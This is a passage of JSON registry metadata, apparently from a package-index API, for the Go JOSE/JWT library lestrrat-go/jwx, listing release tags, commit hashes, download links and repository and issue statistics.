},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:57.956Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.09274594572081,"dependent_packages_count":5.71052111692275,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.90163353132178},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/internal/base64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/base64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/base64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/internal/base64/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fbase64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fbase64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fbase64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fbase64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fbase64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fbase64/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":3498254,"name":"github.com/lestrrat-go/jwx","ecosystem":"go","description":"Package jwx contains tools that deal with the various JWx (JOSE) technologies such as JWT, JWS, JWE, etc in Go.","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go","versions_count":55,"first_release_published_at":"2019-05-20T02:55:45.000Z","latest_release_published_at":"2026-06-13T15:15:39.762Z","latest_release_number":null,"last_synced_at":"2026-06-13T15:15:41.328Z","created_at":"2022-04-10T19:50:13.408Z","updated_at":"2026-06-13T16:12:57.362Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx","install_command":"go get github.com/lestrrat-go/jwx","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk 